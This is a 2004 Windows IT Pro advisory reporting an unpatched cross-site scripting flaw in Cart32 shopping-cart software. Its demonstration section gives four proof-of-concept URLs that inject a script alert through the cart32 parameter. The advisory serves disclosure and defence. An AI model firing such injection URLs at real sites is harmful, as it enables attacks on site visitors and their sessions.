Subscribe to Windows IT Pro
June 28, 2004 12:00 AM

Cross Site Scripting Vulnerability in McMurtrey/Whitaker & Associates' Cart32

Ken Pfeil
Windows IT Pro
InstantDoc ID #43119
Rating: (0)

Reported June 28, 2004, by Dr Ponidi.

VERSIONS AFFECTED

  • McMurtrey/Whitaker & Associates' Cart32 5.0, 4.5, and 3.5a

DESCRIPTION
Cart32 contains a cross-site scripting vulnerability that could let a potential remote attacker insert third-party content in a Web site.

DEMONSTRATION
Any of the following URLs can be used to trigger the vulnerability:
http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

VENDOR RESPONSE
The vendor, McMurtrey/Whitaker & Associates, hasn't released a fix for this vulnerability.

CREDIT
Discovered by Dr Ponidi.

Related Content:

ARTICLE TOOLS

Comments
Add A Comment
    There are no comments to display. Be the first one!
You must log on before posting a comment.

Are you a new visitor? Register Here

advertisement

advertisement

Dev Pro Left-Brain SharePoint Pro SQL Server Pro SuperSite for Windows Windows IT Pro

© 2012 Penton Media, Inc.

Home About Us Advertise Customer Service Privacy Statement Subscribe/Renew Terms Of Use

Windows is a trademark of the Microsoft group of companies. Windows IT Pro is used by Penton Media Inc. under license from owner.